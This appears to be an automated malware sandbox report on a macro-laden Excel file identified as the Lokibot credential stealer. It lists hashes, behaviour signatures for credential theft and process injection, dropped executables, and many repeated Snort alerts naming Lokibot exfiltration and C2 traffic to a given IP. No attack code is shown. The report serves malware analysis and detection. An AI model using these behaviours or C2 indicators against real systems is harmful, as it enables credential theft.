Analysis Report 6Cprm97UTl

Overview

General Information

Sample Name: 6Cprm97UTl (renamed file extension from none to xls)
Analysis ID: 336301
MD5: 29c8b5edc30eadf757b72b0a14857903
SHA1: 77d432fb96a0a453bae30107990c2c9ee0314330
SHA256: a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0

Detection

Hidden Macro 4.0 Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

Machine Learning detection for dropped file
Source: C:\Users\user\Documents\12.exe Joe Sandbox ML: detected
Source: C:\Users\user\ntrwe.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 17_2_00403D74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 4x nop then mov esp, ebp 11_2_0031E458
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 11_2_0031F138
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 11_2_0031CE50
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 4x nop then jmp 00318CF3h 11_2_00318240
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then jmp 00508CF3h 15_2_00508520
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 15_2_0050CE50
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then mov esp, ebp 18_2_0040E132
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then jmp 00408CF3h 18_2_00408515
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 18_2_0040CE50
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 83.172.144.37:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49170
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49215
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49216
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49217
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49218
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49219
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49220
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49221
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49222
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49223
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49224
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49225
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49226
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49227
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49228
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49229
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49230
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49231
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49232
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49233
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49234
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49235
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49236
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49237
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49238
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49239
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49240
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49241
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49242
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49243
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49244
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49245
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49246
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49247
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49248 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49248 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49248 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49248 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49248
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49249 -> 185.206.215.56:80
